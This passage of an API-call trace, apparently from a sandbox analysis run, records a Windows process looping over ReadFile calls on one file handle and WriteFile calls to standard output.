lpOverlapped=0x0 | out: lpBuffer=0x2af074*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.078] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.078] GetFileType (hFile=0x50) returned 0x1 [0195.078] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.078] WriteFile (in: hFile=0x50, lpBuffer=0x2af0c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af0c4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.078] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.078] GetFileType (hFile=0x50) returned 0x1 [0195.078] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.078] WriteFile (in: hFile=0x50, lpBuffer=0x2af114*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af114*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.078] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.078] GetFileType (hFile=0x50) returned 0x1 [0195.078] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.078] WriteFile (in: hFile=0x50, lpBuffer=0x2af164*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af164*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.078] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.078] GetFileType (hFile=0x50) returned 0x1 [0195.078] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.078] WriteFile (in: hFile=0x50, lpBuffer=0x2af1b4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af1b4*, lpNumberOfBytesWritten=0x2ae1b8*=0x20, lpOverlapped=0x0) returned 1 [0195.078] _get_osfhandle (_FileHandle=4) returned 0x58 [0195.078] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae1a4 | out: lpNewFilePointer=0x0) returned 1 [0195.078] _get_osfhandle (_FileHandle=4) returned 0x58 [0195.078] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, 
nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.078] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.078] GetFileType (hFile=0x50) returned 0x1 [0195.079] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.079] GetFileType (hFile=0x50) returned 0x1 [0195.079] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.079] WriteFile (in: hFile=0x50, lpBuffer=0x2aefd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.079] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.079] GetFileType (hFile=0x50) returned 0x1 [0195.079] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.079] WriteFile (in: hFile=0x50, lpBuffer=0x2af024*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af024*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.079] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.079] GetFileType (hFile=0x50) returned 0x1 [0195.079] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.079] WriteFile (in: hFile=0x50, lpBuffer=0x2af074*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af074*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.079] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.079] GetFileType (hFile=0x50) returned 0x1 [0195.079] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.079] WriteFile (in: hFile=0x50, lpBuffer=0x2af0c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af0c4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.079] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.079] GetFileType (hFile=0x50) returned 0x1 [0195.079] _get_osfhandle (_FileHandle=1) returned 
0x50 [0195.079] WriteFile (in: hFile=0x50, lpBuffer=0x2af114*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af114*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.079] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.079] GetFileType (hFile=0x50) returned 0x1 [0195.079] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.079] WriteFile (in: hFile=0x50, lpBuffer=0x2af164*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af164*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.079] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.079] GetFileType (hFile=0x50) returned 0x1 [0195.079] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.079] WriteFile (in: hFile=0x50, lpBuffer=0x2af1b4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af1b4*, lpNumberOfBytesWritten=0x2ae1b8*=0x20, lpOverlapped=0x0) returned 1 [0195.079] _get_osfhandle (_FileHandle=4) returned 0x58 [0195.079] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae1a4 | out: lpNewFilePointer=0x0) returned 1 [0195.080] _get_osfhandle (_FileHandle=4) returned 0x58 [0195.080] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.080] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.080] GetFileType (hFile=0x50) returned 0x1 [0195.080] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.080] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, 
lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.080] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.080] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.080] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.080] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.080] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.080] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.080] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.081] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.081] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: 
lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.081] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.081] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.081] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.081] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.081] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.081] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.081] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.081] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.081] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, 
lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.082] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.082] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.082] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.082] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.082] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.082] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.082] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.082] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.082] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, 
lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.082] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.082] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.082] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.083] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.083] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.083] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.083] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.083] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.083] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, 
nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.083] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.083] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.083] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.083] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.083] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.084] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.084] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.084] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.084] ReadFile (in: hFile=0x58, 
lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.084] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.084] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.084] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.084] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.084] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.084] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.084] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.084] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.085] ReadFile 
(in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.085] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.085] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.085] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.085] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.085] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.085] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.085] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.085] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 
[0195.085] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.086] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.086] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.086] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.086] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.086] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.086] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.086] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.086] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, 
lpOverlapped=0x0) returned 1 [0195.086] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.086] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.086] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.086] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, 